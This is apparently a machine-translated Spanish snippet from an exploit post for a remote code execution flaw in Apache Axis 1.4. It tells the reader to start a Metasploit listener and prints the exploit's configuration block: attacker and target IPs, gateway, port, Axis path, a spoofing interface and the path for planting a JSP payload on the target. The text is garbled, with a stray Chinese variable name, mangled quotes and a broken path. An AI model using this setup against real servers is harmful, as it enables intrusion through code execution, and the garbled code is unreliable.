
Vulnerabilidad de ejecución remota de código en apache axis1.4
Vulnerabilidad de ejecución remota de código en Apache Axis 1.4 Es necesario configurar el listener de msf en la máquina local y modificar el código en las líneas 24-30.
#Debe cambiar estas variables para que coincidan con su configuración myip = “ 192.168.0.117 ” #IP de su máquina target = “ 192.168.0.102 ” #IP de destino 网关= “ 192.168.0.1 ” #Puerta de enlace predeterminada targetport = “ 8080 ” #Puerto en el que el objetivo ejecuta Axis (posiblemente 8080) pathtoaxis = “ http://192.168.0.102:8080/axis ” #Esto puede ser una ruta personalizada de la instalación de Axis, pero esta es la predeterminada spoofinterface = “ eth0 ” #Interfaz de suplantación jspwritepath = “ webapps \ axis \ exploit.jsp ” #Ruta relativa para escribir la carga útil JSP en el objetivo; es la ruta predeterminada de la instalación de Tomcat